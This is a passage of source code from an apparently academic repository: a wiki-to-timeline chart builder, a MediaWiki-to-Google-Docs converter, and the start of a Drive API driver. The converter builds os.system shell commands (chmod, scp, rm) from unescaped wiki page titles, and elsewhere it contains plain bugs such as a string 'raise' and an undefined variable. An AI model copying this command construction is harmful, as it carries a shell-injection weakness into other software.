#aaa;\n background-color: #fff;\n}\n\ntable {\n border: 1px solid #1C6EA4;\n font-size: 120%;\n background-color: #EEEEEE;\n width: 100%;\n text-align: left;\n border-collapse: collapse;\n}\ntable td, table th {\n border: 1px solid #AAAAAA;\n padding: 3px 2px;\n}\ntable tr:nth-child(even) {\n background: #D0E4F5;\n}\ntable thead {\n background: #1C6EA4;\n background: -moz-linear-gradient(top, #5592bb 0%, #327cad 66%, #1C6EA4 100%);\n background: -webkit-linear-gradient(top, #5592bb 0%, #327cad 66%, #1C6EA4 100%);\n background: linear-gradient(to bottom, #5592bb 0%, #327cad 66%, #1C6EA4 100%);\n border-bottom: 2px solid #444444;\n}\ntable thead th {\n font-weight: bold;\n color: #FFFFFF;\n border-left: 2px solid #D0E4F5;\n}\ntable thead th:first-child {\n border-left: none;\n}\n\n</style>\n<script type=\"text/javascript\" src=\"https://www.gstatic.com/charts/loader.js\"></script>\n</head>\n<body>\n\"\"\" + markup + \"</body></html>\"\n\ndef build_chart(category_name, chart_items, warnings, links=\"\"):\n normal_rows = []\n truncated_rows = []\n for item, dates in chart_items.items():\n bar_added = False\n if dates['Planning Start Date']:\n bar_added = True\n # Could be a project or a study\n if dates['Project Start Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Planning', dates['Planning Start Date'], dates['Project Start Date'])\n\n elif dates['Piloting Start Date']:\n append_rows(normal_rows, truncated_rows, item,\n 
'Planning', dates['Planning Start Date'], dates['Piloting Start Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Planning with No Piloting Start', dates['Planning Start Date'], today + six_months)\n\n if dates['Project Start Date']:\n bar_added = True\n if dates['Project End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Project', dates['Project Start Date'], dates['Project End Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Project with No End Date', dates['Project Start Date'], today + six_months)\n\n if dates['Piloting Start Date']:\n bar_added = True\n if dates['Collecting Start Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Piloting', dates['Piloting Start Date'], dates['Collecting Start Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Piloting with No Collection Start', dates['Piloting Start Date'], today + six_months)\n\n if dates['Collecting Start Date']:\n bar_added = True\n if dates['Collecting End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Collecting', dates['Collecting Start Date'], dates['Collecting End Date'])\n elif dates['End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Collecting', dates['Collecting Start Date'], dates['End Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Piloting with No Collection Start', dates['Piloting Start Date'], today + six_months)\n\n if dates['Collecting End Date']:\n bar_added = True\n append_rows(normal_rows, truncated_rows, item,\n 'Wrapping Up', dates['Collecting End Date'], dates['End Date'])\n\n # Grants\n if dates['Letter of Intent Due']:\n bar_added = True\n if dates['Submission Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Writing', dates['Letter of Intent Due'], dates['Submission Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Grant with No Submission Date', dates['Letter of Intent Due'], dates['Letter of Intent Due'] + six_months)\n\n # Default to a boring \"Active\" bar if we added no specific dates\n if not bar_added and dates['Start Date'] and dates['End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Active', dates['Start Date'], dates['End Date'])\n\n\n preamble = \"\"\"\n<h1>Near Future</h1>\n<div class=\"timeline-wrapper\">\n<div id=\"near-timeline\"></div>\n</div>\n\n<h1>Entire History</h1>\n<div class=\"timeline-wrapper\">\n<div id=\"study-timeline\"></div>\n</div>\n\n<h5>Date Parsing Warnings</h5>\n\"\"\" + \"<br/>\".join(warnings) + \"\"\"\n\n<script type=\"text/javascript\">\n google.charts.load(\"current\", {packages:[\"timeline\"]});\n google.charts.setOnLoadCallback(drawCharts);\n function drawChart(id, data, width) {\n var container = document.getElementById(id);\n var chart = new google.visualization.Timeline(container);\n var dataTable = new google.visualization.DataTable();\n dataTable.addColumn({ type: 'string', id: 'Role' });\n dataTable.addColumn({ type: 'string', id: 'Name' });\n dataTable.addColumn({ type: 'string', id: 'style', role: 'style' });\n dataTable.addColumn({ type: 'date', id: 'Start' });\n dataTable.addColumn({ type: 'date', id: 'End' });\n dataTable.addRows(data);\n // set a padding value to cover the height of title and axis values\n var paddingHeight = 50;\n // set the height to be covered by the rows\n var rowHeight = dataTable.getNumberOfRows() * 44;\n // set the total chart height\n var chartHeight = rowHeight + paddingHeight;\n\n chart.draw(dataTable, { width: width, height: chartHeight });\n }\n function 
drawCharts() {\n\"\"\"\n\n ending = \"\"\"\n drawChart('near-timeline', near, 2000);\n drawChart('study-timeline', all, 2000);\n }\n</script>\n\"\"\"\n\n data1 = \"var near = [{}];\".format(\",\\n\".join(truncated_rows))\n data2 = \"var all = [{}];\".format(\",\\n\".join(normal_rows))\n\n return make_html(f\"Chart for category {category_name}\", links + preamble + data1 + data2 + ending)\n\n\ndef build_table(category, chart_items, links=\"\"):\n content = [\n f\"<h1>Dates for category {category}</h1>\",\n \"<table><thead><tr>\"]\n def add_header(x):\n content.append(f\"<th>{x}</th>\")\n add_header(\"Name\")\n for x in TO_EXTRACT[category]:\n add_header(x)\n content.append(\"</tr></thead>\")\n\n for item, dates in chart_items.items():\n content.append(\"<tr>\")\n content.append(f\"<td><a href='{WIKI_URL}/{item}'>{item}</a></td>\")\n def add(x):\n if dates[x]:\n content.append(\"<td>✓</td>\")\n else:\n content.append(\"<td></td>\")\n for x in TO_EXTRACT[category]:\n add(x)\n content.append(\"</tr>\")\n\n content.append(\"</table>\")\n content.append(links)\n return make_html(f\"Dates for category {category}\", \"\\n\".join(content))\n\ndef fill_hash_dates(warnings, page, template, dates, key):\n if template.has(key):\n d = template.get(key).value.strip()\n if d == \"\":\n return\n try:\n if re.match(r'^\\D{3}', d) is not None:\n pattern = \"%B %d, %Y\"\n elif re.match(r'^\\d{4}', d) is not None:\n pattern = \"%Y/%m/%d\"\n else:\n pattern = \"%m/%d/%Y\"\n dates[key] = datetime.strptime(d, pattern)\n except ValueError:\n year = re.match('^[0-9]{4}', d)\n if year is not None:\n year = int(year.group(0))\n warning = \"Only found year {} for date {} on page {} from value '{}', guessing January 1\".format(year, key, page, d)\n warnings.append(warning)\n logging.warning(warning)\n dates[key] = datetime(year, 1, 1)\n else:\n warning = \"Could not get {} for page {} from template value '{}'\".format(key, page, d)\n warnings.append(warning)\n logging.warning(warning)\n\n\ndef run(mother):\n chart_data = {}\n chart_warnings = {}\n def extract(category_name, date_fields):\n logging.info(f\"Extracting {date_fields} from Category:{category_name}\")\n category = mother.categories[category_name]\n\n data = {}\n warnings = []\n for page in category:\n thing = page.name\n logging.debug(f\"Reading dates from page {thing}\")\n text = page.text()\n p = mwparserfromhell.parse(text)\n\n dates = data[thing] = defaultdict(lambda: False)\n\n for template in p.filter_templates():\n for field in date_fields:\n fill_hash_dates(warnings, thing, template, dates, field)\n return data, warnings\n\n for category_name, fields in TO_EXTRACT.items():\n chart_data[category_name], chart_warnings[category_name] = \\\n extract(category_name, fields)\n\n # Now we write the chart for each kind\n\n link_all_timelines = \"<h2><a href='index.html'>Back to all timelines</a></h2>\"\n for category_name, items in chart_data.items():\n with open(f\"/home/dfitch/pub_html/timeline/{category_name}.html\", \"w\") as output:\n chart_markup = build_chart(category_name, items, chart_warnings[category_name],\n link_all_timelines +\n f\"<h2><a href='{category_name}_dates.html'>View {category_name} date report</a></h2>\")\n output.write(chart_markup, )\n\n with open(f\"/home/dfitch/pub_html/timeline/{category_name}_dates.html\", \"w\") as output:\n markup = build_table(category_name, items,\n link_all_timelines +\n f\"<h2><a href='{category_name}.html'>View {category_name} timeline</a></h2>\")\n output.write(markup)\n\n # Join dictionaries\n all_items 
= {}\n all_items.update(chart_data['Grant'])\n all_items.update(chart_data['Project'])\n all_items.update(chart_data['Study'])\n\n # And finally the chart of everything joined together\n chart_markup = build_chart(\"All\", all_items, [],\n \"<h2><a href='Grant.html'>View only grants</a> | \" +\n \"<a href='Project.html'>View only projects</a> | \" +\n \"<a href='Study.html'>View only studies</a></h2>\" +\n f\"<h2><a href='{WIKI_URL}/Category:Grant'>Wiki grants listing</a> | \" +\n f\"<a href='{WIKI_URL}/Category:Project'>Wiki projects listing</a> | \" +\n f\"<a href='{WIKI_URL}/Category:Study'>Wiki studies listing</a></h2>\")\n with open(\"/home/dfitch/pub_html/timeline/index.html\", \"w\") as output:\n output.write(chart_markup)\n\n"
},
{
"alpha_fraction": 0.6439024209976196,
"alphanum_fraction": 0.6439024209976196,
"avg_line_length": 33,
"blob_id": "3959a7a3c47929b36fbd46053854e8e68e219ea9",
"content_id": "6a82b4848fdca0fa3ef32f3fd2794a4699b8f937",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 6,
"path": "/utilities.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "\ndef study_template(p):\n study_regex = r\"Study\"\n for template in p.filter_templates(matches=study_regex):\n if template.name.strip() == study_regex:\n return template\n return None\n"
},
{
"alpha_fraction": 0.4849896728992462,
"alphanum_fraction": 0.4878661334514618,
"avg_line_length": 34.10953140258789,
"blob_id": "3789265a9ca34f15148edf54377592aa4efadfa0",
"content_id": "5bf89b9f3a884bb1f8adc642cce0823d90754ee1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24683,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 703,
"path": "/gdocconverter.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwparserfromhell\nimport logging\nimport re\nimport time\nimport tempfile\nimport socket\nimport os\n\nfrom enum import Enum\n\nFONT_SIZE_DEFAULT = 11\nFONT_SIZE_TABLE = 8\n\nclass NodeResponseKind(Enum):\n NONE = 1\n BULLET = 2\n\nclass BulletKind(Enum):\n NORMAL = 1\n NUMERIC = 2\n\nclass NodeResponse:\n def __init__(self):\n self.kind = NodeResponseKind.NONE\n self.is_bold = False\n self.is_italic = False\n self.last_was_heading = False\n self.font_size = FONT_SIZE_DEFAULT\n\n def is_bullet(self):\n return self.kind == NodeResponseKind.BULLET\n\n def toggle_bold(self):\n self.is_bold = not self.is_bold\n return self\n\n def toggle_italic(self):\n self.is_italic = not self.is_italic\n return self\n\n def set_bullet(self, level):\n self.kind = NodeResponseKind.BULLET\n self.bullet_kind = BulletKind.NORMAL\n self.level = level\n return self\n\n def set_numeric_bullet(self, level):\n self.kind = NodeResponseKind.BULLET\n self.bullet_kind = BulletKind.NUMERIC\n self.level = level\n return self\n\n def bullet_complete(self):\n self.kind = NodeResponseKind.NONE\n return self\n\n def __str__(self):\n s = \"\"\n if self.is_bullet():\n return \"* \"\n else:\n return \"None\"\n\n\nGOOGLE_DOCS_PREFIX = \"https://docs.google.com/document/d/\"\nGOOGLE_DRIVE_PREFIX = \"https://drive.google.com/file/d/\"\n\n\nclass GDocConverter:\n \"\"\"\n Generic converter class, called by GDocExporter\n\n Uses most of the same APIs\n\n `file_prefix` is used to store image and other files in a \n public-internet-accessible location so the Google Docs API can read them \n from `http_prefix`\n \"\"\"\n\n def __init__(self, driver, wiki, wiki_prefix, docs, mappings, file_prefix, http_prefix):\n self.driver = driver\n self.wiki = wiki\n self.wiki_prefix = wiki_prefix\n self.docs = docs\n self.mappings = mappings\n self.file_prefix = file_prefix\n self.http_prefix = http_prefix\n\n\n def convert(self, page, doc_id, debug=False):\n \"\"\"\n Convert content from a given `page` into a google document at `doc_id`.\n\n Passing `debug=True` will run requests one at a time, so you can see \n the document getting created from the \"bottom up\" and debug API errors\n \"\"\"\n\n self.doc_id = doc_id\n\n # If we were really fancy, we would try to do merging of content.\n # But we're just going to brute force override old content.\n self.clear_document()\n\n # Note that the Google Docs API recommends that you \"create\n # backwards\" because of the indexes changing on edits.\n # So we insert everything at index 1 and then flip the order of operations\n requests = []\n\n requests += self.insert_heading_text(1, page.name + \"\\n\", level='TITLE') \n requests += self.insert_link(1, \"Original wiki location\\n\\n\", self.wiki_prefix + str(page.name)) \n\n oldtext = page.text()\n requests.extend(self.wiki_markup_to_requests(oldtext))\n\n requests = list(reversed(requests))\n flat_requests = []\n for x in requests:\n if isinstance(x, list):\n flat_requests.extend(x)\n else:\n flat_requests.append(x)\n\n self.driver.batch_update(self.doc_id, flat_requests, debug=debug)\n\n\n def wiki_markup_to_requests(self, markup, start_index=1, status=None):\n \"\"\"\n Turn Mediawiki markup into a series of Google Docs API requests.\n\n Note that it mutates requests in place because the `node_to_requests`\n function returns stateful NodeResponse. 
Better way would be to combine\n requests into that state object, but that's hard and confusing so\n I'm leaving this as is for now.\n\n `start_index` is usually 1, where we are inserting into the doc,\n because we're going in reverse. But sometimes inside tables we might\n need to insert at a different specific index.\n \"\"\"\n requests = []\n p = mwparserfromhell.parse(self.cleanup_markup(markup))\n nodes = list(p.nodes)\n if not status:\n status = NodeResponse()\n\n # Now just loop over the nodes, accumulating the last status\n for node in nodes:\n status = self.node_to_requests(node, requests, status, start_index=start_index)\n\n return requests\n\n\n def cleanup_markup(self, text):\n \"\"\"\n Initial pass to cleanup the mediawiki linefeeds and stuff that we don't\n want to even have in the parse.\n\n Mostly tries to remove extra line feeds in between text; mediawiki \n does not break there when displaying (impedance mismatch between docs \n and html whitespace)\n \"\"\"\n text = re.sub(r\"(\\w) *\\n *(\\w)\", r\"\\1 \\2\", text)\n # Cleaning up space around headings\n text = re.sub(\"=\\n{2,}\", \"=\\n\", text)\n text = re.sub(\"\\n{2,}=\", \"\\n=\", text)\n text = re.sub(\"\\n{2,}\", \"\\n\\n\", text)\n text = re.sub(\"__NOTOC__\\n*\", \"\", text)\n return text\n\n\n def node_to_text(self, node):\n \"\"\"\n Turn a mwparserfromhell node into plaintext.\n\n NOTE: Again, this makes us losing formatting inside (if there is any), \n and is probably doing the wrong thing for some kinds of content\n \"\"\"\n\n if node is None:\n return ''\n \n return str(node)\n\n\n def is_image(self, name):\n return name.endswith(\".jpg\") or name.endswith(\".png\") or name.endswith(\".gif\")\n\n\n def node_to_requests(self, node, requests, status, start_index=1):\n if isinstance(node, mwparserfromhell.nodes.comment.Comment):\n logging.debug(f\"Skipping comment: {str(node)}\")\n\n elif isinstance(node, mwparserfromhell.nodes.text.Text):\n text = self.node_to_text(node)\n\n if text == '' or not text:\n # Don't insert anything\n return status\n if status and status.is_bullet():\n # TODO: insert_bullet_text is way too happy at inserting bullets\n requests.append(self.insert_bullet_text(start_index, status, str(node)))\n # requests.append(self.insert_text(start_index, text, status))\n status = status.bullet_complete()\n else:\n requests.append(self.insert_text(start_index, text, status))\n\n elif isinstance(node, mwparserfromhell.nodes.heading.Heading): \n original_text = str(node)\n stripped = original_text.lstrip('=')\n level = \"HEADING_\" + str(len(original_text) - len(stripped))\n text = re.sub(\"(^=+|=+$)\", \"\", original_text, 2)\n text = re.sub(\"'{2,}\", \"\", text)\n text = text.strip()\n requests.append(self.insert_heading_text(start_index, text, level))\n\n elif isinstance(node, mwparserfromhell.nodes.wikilink.Wikilink):\n if node.title is None:\n raise \"Unclear what to do with a wikilink that has no title destination\"\n else:\n title = self.node_to_text(node.title)\n # Strip off front colon that makes it go straight to the file/category\n title = title.strip(\":\")\n\n doc_id = self.mappings.get_id_for_title(title)\n if doc_id:\n url = GOOGLE_DOCS_PREFIX + doc_id + \"/edit\"\n else:\n url = \"wiki://\" + title\n\n text = self.node_to_text(node.text).strip()\n if not text:\n text = title\n\n if \"File:\" in title or \"Media:\" in title:\n # Mediawiki lets you insert thumbnails of PDFs, let's not bother with that\n if \"thumb\" in text and self.is_image(title):\n thumb_params = 
text.split(\"|\")\n additional_text = \"\\n\"\n if len(thumb_params) > 0:\n # NOTE: This is probably not the right way to choose what part of the parameters are the caption\n caption = thumb_params[-1]\n if not caption == \"thumb\" and not \"px\" in caption:\n additional_text = \"\\n\" + caption\n\n image = self.wiki.pages[title]\n escaped_title = title.replace(\" \", \"_\")\n uri = self.http_prefix + \"/\" + escaped_title\n filename = self.file_prefix + \"/\" + escaped_title\n if 'baldi' in socket.gethostname():\n with open(filename, 'wb') as fd:\n image.download(fd)\n else:\n _, tempfilename = tempfile.mkstemp()\n with open(tempfilename, 'wb') as fd:\n image.download(fd)\n cmd = f\"chmod 664 '{tempfilename}'\"\n os.system(cmd)\n cmd = f\"scp '{tempfilename}' baldi:'{filename}'\"\n os.system(cmd)\n os.system(f\"rm {tempfilename}\")\n\n # TODO: Consider extracting width from thumb_params and passing along?\n logging.info(f\"Trying to insert image at url: {uri}\")\n # TODO: Disable when image truncation is \"solved\"\n # requests.append(self.insert_image(start_index, uri))\n requests.append(self.insert_text(start_index, \"IMAGE PENDING\"))\n\n requests.append(self.insert_text(start_index, additional_text))\n\n elif title in self.mappings.file_to_id:\n url = GOOGLE_DRIVE_PREFIX + self.mappings.file_to_id[title]\n requests.append(self.insert_link(start_index, text, url))\n\n else:\n # Insert link to file that we'll fix up in a second pass\n url = \"wiki://\" + title\n requests.append(self.insert_link(start_index, text, url))\n else:\n requests.append(self.insert_link(start_index, text, url))\n\n elif isinstance(node, mwparserfromhell.nodes.external_link.ExternalLink):\n text = self.node_to_text(node.title).strip()\n url = self.node_to_text(node.url)\n if text == \"\":\n text = url\n requests.append(self.insert_link(start_index, text, url))\n\n elif isinstance(node, mwparserfromhell.nodes.tag.Tag): \n if node.wiki_markup == '*':\n return status.set_bullet(level=1) \n elif node.wiki_markup == '**':\n return status.set_bullet(level=2) \n elif node.wiki_markup == '***':\n return status.set_bullet(level=3) \n elif node.wiki_markup == '****':\n return status.set_bullet(level=4) \n elif node.wiki_markup == '*****':\n return status.set_bullet(level=5) \n elif node.wiki_markup == '******':\n return status.set_bullet(level=6) \n elif node.wiki_markup == '#':\n return status.set_numeric_bullet(level=1) \n elif node.wiki_markup == '##':\n return status.set_numeric_bullet(level=2) \n elif node.wiki_markup == '###':\n return status.set_numeric_bullet(level=3) \n elif node.wiki_markup == '####':\n return status.set_numeric_bullet(level=4) \n elif node.wiki_markup == '#####':\n return status.set_numeric_bullet(level=5) \n elif node.wiki_markup == '######':\n return status.set_numeric_bullet(level=6) \n elif node.wiki_markup == '{|':\n requests.append(self.insert_table(start_index, node))\n elif node.wiki_markup is None:\n text = str(node)\n logging.info(f\"No markup in tag? 
Likely raw html: {text}\")\n # TODO: Clean up various kinds of html?\n # There's at least:\n # <nowiki /> (often used to escape bullets, can maybe just drop the tag?)\n # <gallery /> ex: CHM Communications and Branding Style Guide\n # <blockquote />\n # <u />\n # <pre />\n # <syntaxhighlight /> ex: FreeSurfer Setup\n # <code />\n # <sup />\n # <s />\n if text == \"<br>\":\n requests.append(self.insert_text(start_index, \"\\n\"))\n else:\n # TODO: better HTML stripping from a library would be smart\n text = re.sub('<[^<]+?>', '', text)\n requests.append(self.insert_text(start_index, text, status))\n\n elif \"''\" in str(node.wiki_markup):\n def toggle():\n if node.wiki_markup == \"'''''\":\n status.toggle_bold()\n status.toggle_italic()\n elif node.wiki_markup == \"'''\":\n status.toggle_bold()\n elif node.wiki_markup == \"''\":\n status.toggle_italic()\n\n clean = re.sub(\"'{2,}\", \"\", str(node))\n toggle()\n requests.append(self.insert_text(start_index, clean, status))\n toggle()\n\n elif \"---\" in str(node.wiki_markup):\n logging.info(f\"Skipping horizontal rule\")\n else:\n logging.warning(f\"Got unknown Tag node with markup {node.wiki_markup}, skipping\")\n\n elif isinstance(node, mwparserfromhell.nodes.html_entity.HTMLEntity): \n # Just output the Unicode version of whatever this is\n text = node.normalize()\n if text:\n requests.append(self.insert_text(start_index, text))\n\n elif isinstance(node, mwparserfromhell.nodes.template.Template): \n template_name = node.name.strip() \n requests.append(self.insert_text(start_index, f\"<template for {template_name} goes here>\"))\n logging.info(f\"Skipping template\")\n\n else:\n cls = str(node.__class__)\n logging.warning(f\"Got node with class {cls}, skipping\")\n\n return status\n\n\n def clear_document(self):\n idxend = self.get_last_index()\n if idxend <= 2:\n # Doc already empty\n return\n self.driver.batch_update(self.doc_id, [{\n 'deleteContentRange': {\n 'range': {\n 'startIndex': 1,\n 'endIndex': idxend-1,\n }\n }}])\n\n\n def insert_text(self, idx, text, status=None):\n \"\"\"\n Create text.\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n insert_text = {\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': text\n }\n }\n\n is_bold = False\n is_italic = False\n if status:\n is_bold = status.is_bold\n is_italic = status.is_italic\n\n pt = FONT_SIZE_DEFAULT\n if status:\n pt = status.font_size\n\n update_text = {\n 'updateTextStyle': {\n 'range': {\n 'startIndex': idx,\n 'endIndex': idx + len(text)\n },\n 'textStyle': {\n 'bold': is_bold,\n 'italic': is_italic,\n 'fontSize': {\n 'magnitude': pt,\n 'unit': 'PT'\n },\n },\n 'fields': 'bold, italic, fontSize'\n }\n }\n\n return [[insert_text, update_text]]\n\n\n def insert_heading_text(self, idx, text, level='HEADING_1'):\n \"\"\"\n Create a heading in the document.\n\n Levels are here: https://developers.google.com/docs/api/reference/rest/v1/documents?hl=en#NamedStyleType\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n return [[{\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': text\n }\n },\n {\n 'updateParagraphStyle': {\n 'range': {\n 'startIndex': idx,\n 'endIndex': idx + len(text)\n },\n 'paragraphStyle': {\n 'namedStyleType': level,\n },\n 'fields': 'namedStyleType'\n }\n },\n # This is real dumb, but if we don't insert a paragraph and force \n # it to NORMAL, the stuff preceding this header in the document \n # will get header-tized when the requests are all reversed and \n # batched up. 
It leads to a really dumb extra blank paragraph that \n # gets the formatting, but I can't find a good way around that\n {\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': \"\\n\"\n }\n },\n {\n 'updateParagraphStyle': {\n 'range': {\n 'startIndex': idx,\n 'endIndex': idx\n },\n 'paragraphStyle': {\n 'namedStyleType': 'NORMAL_TEXT',\n },\n 'fields': 'namedStyleType'\n }\n },\n ]]\n\n\n def insert_bullet_text(self, idx, status, text):\n \"\"\"\n Create bullets in the document.\n\n I couldn't figure out how to do this without completely\n bulletting everything in the doc, so I stole the idea from\n https://stackoverflow.com/questions/65330602/how-do-i-indent-a-bulleted-list-with-the-google-docs-api\n to do a really dumb set of insertions and deletions\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n if status.bullet_kind == BulletKind.NUMERIC:\n bullet_preset = 'NUMBERED_DECIMAL_ALPHA_ROMAN_PARENS'\n else:\n bullet_preset = 'BULLET_DISC_CIRCLE_SQUARE'\n\n bullet_text = (\"\\t\" * (status.level - 1)) + text\n\n return [[\n { 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': f\"\\n\"\n }},\n { 'createParagraphBullets': {\n 'range': {\n 'startIndex': idx+1,\n 'endIndex': idx+1\n },\n 'bulletPreset': bullet_preset,\n }},\n { 'insertText': {\n 'location': {\n 'index': idx+1,\n },\n 'text': bullet_text\n }},\n { 'deleteContentRange': {\n 'range': {\n 'startIndex': idx + len(bullet_text),\n 'endIndex': idx + len(bullet_text) + 1\n },\n }},\n ]]\n\n\n def insert_image(self, idx, uri):\n \"\"\"\n Insert image accessible at the given URI.\n \"\"\"\n\n return [[\n {\n 'insertInlineImage': {\n 'location': {\n 'index': idx,\n },\n 'uri': uri,\n 'objectSize': {\n 'width': {\n 'magnitude': 200,\n 'unit': 'PT'\n }\n }\n }\n }\n ]]\n\n\n def insert_link(self, idx, text, url):\n \"\"\"\n Insert hyperlink with given text and URL.\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n return [[\n {\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': text\n }\n },\n {\n \"updateTextStyle\": {\n \"textStyle\": {\n \"link\": {\n \"url\": url\n }\n },\n \"range\": {\n \"startIndex\": idx,\n \"endIndex\": idx + len(text)\n },\n \"fields\": \"link\"\n }\n }\n ]]\n\n\n def insert_table(self, idx, markup):\n \"\"\"\n Create table, given the raw mediawiki markup\n \"\"\"\n\n rows = markup.contents.split(\"|-\")\n # Not sure how header exclamations in wikitable markup are escaped?\n # Here we're just going to eat whether a row is a header and not try\n # to format it at all\n rows[0] = rows[0].replace(\"!\", \"|\")\n # NOTE: Naive split on \"|\" breaks on tables with links that use |,\n # so the ^|\\n here is a bad hack to get by those\n split_rows = [re.split(r\"(?:^|\\n)\\|\", r)[1:] for r in rows]\n max_columns = max([len(r) for r in split_rows])\n if max_columns == 0:\n logging.warning(f\"Hit table with no columns? 
Skipping\")\n return self.insert_text(idx, \"[Table failed to convert]\")\n\n def table_index_of_cell(i, j):\n # Complicated math to find index location of a given cell \n # in the crazy google docs json tree counting system, yuck\n return (3 + i + max_columns * i * 2) + (j + 1) * 2\n\n # For some reason we have to tweak this, you would think it would be \n # just the same as the table index of the last cell, but it's not\n end_of_font_range = table_index_of_cell(len(split_rows), max_columns) - max_columns * 2\n\n requests = [\n { 'insertTable': {\n 'location': { 'index': idx, },\n 'rows': len(rows),\n 'columns': max_columns }},\n { 'updateTextStyle': {\n 'range': {\n 'startIndex': 1,\n 'endIndex': end_of_font_range\n },\n 'textStyle': {\n 'fontSize': {\n 'magnitude': FONT_SIZE_TABLE,\n 'unit': 'PT'\n },\n },\n 'fields': 'fontSize'\n }}\n ]\n\n all_cell_requests = []\n\n for i, row in enumerate(split_rows):\n for j, cell in enumerate(row):\n text = cell.strip()\n if text:\n index = table_index_of_cell(i, j)\n\n # Now we parse the cell's content and convert that, too, \n # because it could have links and what not\n table_status = NodeResponse()\n table_status.font_size = 9\n cell = self.wiki_markup_to_requests(text, index, status=table_status)\n all_cell_requests.extend(cell)\n\n # TODO: Links not getting output here???\n\n requests.extend(reversed(all_cell_requests))\n\n # Remember, we have to wrap the list of actions in another list\n # so it doesn't get reversed, we've already set it up to happen\n # exactly in the order we want\n return [requests]\n\n\n def get_content(self):\n return self.driver.get_document(self.doc_id).get('body').get('content')\n\n\n def get_last_index(self):\n content = self.get_content()\n last = content[-1]\n return last['endIndex']\n\n\n def get_text_range(self, match_text):\n \"\"\"\n Find `match_text` and return its start and end index.\n \"\"\"\n\n data = self.get_content()\n\n for d in data:\n para = d.get('paragraph')\n if para is None:\n continue\n else:\n elements = para.get('elements')\n for e in elements:\n if e.get('textRun'):\n content = e.get('textRun').get('content')\n if match_text in content:\n # Do we want to adjust to WHERE in content, or just return the whole run?\n idx = e.get('startIndex')\n inxend = e.get('endIndex')\n return idx, endIdx\n\n return None, None\n\n"
},
{
"alpha_fraction": 0.5771434903144836,
"alphanum_fraction": 0.5787166953086853,
"avg_line_length": 36.156578063964844,
"blob_id": "33501bcd8c402e86513295429d3715ecfb4f9019",
"content_id": "ce25e8a73f1fc5720f40f6c03b483552debe0d33",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17798,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 479,
"path": "/gdocdriver.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwparserfromhell\nimport logging\nimport requests\nimport os\nimport time\nimport pytz\nfrom datetime import datetime\nfrom dateutil import parser\n\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\n\nfrom gdocmappings import GDocMappings \nfrom gdocconverter import GDocConverter\nfrom gdoclinks import GDocLinks\n\nSCOPES = ['https://www.googleapis.com/auth/documents',\n 'https://www.googleapis.com/auth/drive',\n 'https://www.googleapis.com/auth/drive.file',\n 'https://www.googleapis.com/auth/drive.metadata']\nMAPPINGS_FILE = \"mappings.google.json\"\n\n# Limit to how many parents to request via Drive API\nMAX_PARENTS = 500\n\nclass GDocDriver:\n \"\"\"\n Class that controls a connection to the Drive and Docs APIs\n and knows how to run conversions from MediaWiki into Docs files.\n\n Also beginning to add \"walking\" functionality to run arbitrary\n updates on docs in a given folder\n \"\"\"\n\n def __init__(self, mappings_path, drive_id):\n \"\"\"\n GDocDriver needs a path to mappings. See `gdocmappings.py`.\n\n Google services auth is OAuth, so it will try to start $BROWSER\n if there is no cached token.\n\n `file_prefix` is used by the converter to store image and other\n files in a public-internet-accessible location so the Google Docs\n API can read them from `http_prefix`\n \"\"\"\n\n self.mappings = GDocMappings(MAPPINGS_FILE)\n self.initialize_google_services()\n self.drive_id = drive_id\n self.folders = {}\n\n\n def run_export(self, wiki, wiki_prefix, force, older, file_prefix, http_prefix, unsorted_folder_id, page_title):\n \"\"\"\n Function that does the conversion from mediawiki to gdoc,\n walking the mediawiki pages\n \"\"\"\n\n self.wiki = wiki\n self.wiki_prefix = wiki_prefix\n self.file_prefix = file_prefix\n self.http_prefix = http_prefix\n self.unsorted_folder_id = unsorted_folder_id\n\n if page_title:\n # We don't need to load common folders if the doc already exists\n if not page_title in self.mappings.title_to_id:\n self.load_common_folders()\n self.convert_one(page_title)\n else:\n self.load_common_folders()\n if force:\n self.convert_all()\n if older:\n self.convert_all(older_than=older)\n else:\n self.convert_all_new()\n\n self.mappings.save()\n\n\n def run_check_links(self, wiki, file_prefix, files_folder_id, folder_id):\n docs = self.recursive_docs_in_folder(folder_id)\n\n for doc_id in docs.keys():\n linker = GDocLinks(wiki, self, file_prefix, files_folder_id)\n linker.check_links(doc_id)\n\n\n def recursive_docs_in_folder(self, folder_id):\n relevant_folders = [folder_id]\n for folder in self.folders_in_folder(folder_id):\n relevant_folders.append(folder)\n return self.get_relevant_files(relevant_folders)\n\n\n def get_relevant_files(self, relevant_folders):\n \"\"\"\n Get files under the relevant_folders and all their 